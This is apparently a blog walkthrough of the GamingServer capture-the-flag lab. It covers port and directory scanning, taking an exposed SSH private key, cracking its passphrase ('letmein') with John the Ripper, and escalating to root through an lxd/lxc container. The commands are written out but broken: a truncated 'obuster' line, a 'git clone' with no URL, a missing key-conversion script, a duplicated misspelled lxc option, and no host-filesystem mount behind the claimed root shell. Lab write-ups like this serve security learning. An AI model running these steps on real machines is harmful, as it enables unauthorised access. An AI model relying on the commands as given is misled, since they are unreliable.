GamingServer CTF

Start a nmap scan to look for open ports.

Use gobuster look for hidden directories.

Found a potential user on the source code: john

obuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Download the dict.lst file.

Download the secretKey file which is a private key.

The private key needs a passphrase.

Use johntheripper to crack he passphrase.

python secretKey > secretkey.hash

john secretkey.hash -wordlist dict.lst

passphrase found: letmein

SSH to the user.

First flag is found.

Start up python server and transfer linpeas to find for clues.

The machine can be exploited by lxd

Head to your main machine and execute the following commands.

git clone

cd lxd-alpine-builder

sudo ./build-alpine

Transfer the file to the victim machine and execute the following commands.

lxc image list

lxc image import ./alpine-v3.15-x86_64-20220414_2008.tar.gz --alias myimage

lxc init myimage ignite -c security.previleged=true

lxc init myimage ignite -c security.privileged=true

lxc start ignite

lxc exec ignite /bin/sh

Root access is gained and final flag is found.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s